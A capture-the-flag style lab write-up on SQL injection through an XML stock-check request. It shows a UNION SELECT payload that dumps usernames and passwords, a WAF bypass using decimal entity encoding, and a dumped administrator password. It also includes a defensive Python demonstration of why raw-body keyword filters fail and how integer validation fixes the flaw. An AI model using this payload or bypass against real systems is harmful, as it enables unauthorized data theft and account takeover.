Navigate to the webpage
Click on stock and capture the request in Burp Suite
So, we have a table users and columns username and password
Checking the hint we were given
Let's try to download this extension
We are done installing it. We'll be using this query to dump the contents of the database
1 UNION SELECT username || ':' || password FROM users
Our attack got detected, so let's encode this using the Hackvertor extension we just installed. To do this, just highlight the query, right-click, then select Extensions > Hackvertor > Encode > dec_entities
We have successfully dumped the contents of the database. Let's go ahead and log in as the administrator user
username: administrator
password: hhkovl3d48vch2ix840b
We have successfully completed this lab
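Why does the dec_entities encoding get past the filter in this lab? Because the filter inspects the raw request body, while the XML parser decodes numeric character references such as &#85; before the value ever reaches the SQL layer, so the two see different strings. The added example below (my own, not the lab's code or Hackvertor's) reproduces that mismatch in Python: a keyword filter on the raw body, the same filter after parsing, and the check that actually fixes the problem, strict type validation of the parsed productId before it is used. The element names of the stock-check body and the function names are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Assumed shape of the stock-check request body (element names are a guess).
def stock_check_body(product_id, store_id="1"):
    return f"<stockCheck><productId>{product_id}</productId><storeId>{store_id}</storeId></stockCheck>"

def dec_entities(text):
    """Encode every character as a decimal XML character reference (&#N;),
    which is what the write-up's Hackvertor transform does to the payload."""
    return "".join(f"&#{ord(c)};" for c in text)

SQL_KEYWORDS = re.compile(r"\b(?:union|select)\b", re.IGNORECASE)

def raw_body_filter_blocks(body):
    """Keyword filter applied to the request body as received, before XML parsing.
    This is the flawed placement: entity-encoded text contains no keywords."""
    return bool(SQL_KEYWORDS.search(body))

def parse_stock_check(body):
    """Parse the body; the XML parser decodes character references here."""
    root = ET.fromstring(body)
    return root.findtext("productId"), root.findtext("storeId")

def decoded_filter_blocks(body):
    """The same keyword filter, applied to the parsed values the application will use."""
    return any(SQL_KEYWORDS.search(v or "") for v in parse_stock_check(body))

def validated_product_id(body):
    """The real fix: accept only a small positive integer, after parsing.
    Returns the integer, or None if the value is anything else."""
    product_id, _ = parse_stock_check(body)
    if not re.fullmatch(r"\d{1,9}", product_id or ""):
        return None
    return int(product_id)

# The payload from the write-up, in plain and entity-encoded form.
PAYLOAD = "1 UNION SELECT username || ':' || password FROM users"
PLAIN_BODY = stock_check_body(PAYLOAD)
ENCODED_BODY = stock_check_body(dec_entities(PAYLOAD))

if __name__ == "__main__":
    print("raw filter, plain body:   ", raw_body_filter_blocks(PLAIN_BODY))
    print("raw filter, encoded body: ", raw_body_filter_blocks(ENCODED_BODY))
    print("decoded filter, encoded:  ", decoded_filter_blocks(ENCODED_BODY))
    print("validated productId:      ", validated_product_id(ENCODED_BODY))
    print("validated productId (1):  ", validated_product_id(stock_check_body("1")))
```

A keyword filter is still a denylist even when placed after decoding, and it would have to keep up with every other encoding and keyword variant; the integer check rejects the whole class of inputs at once, and the value it returns can then be bound as a query parameter rather than spliced into SQL.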
Till Next Time :xD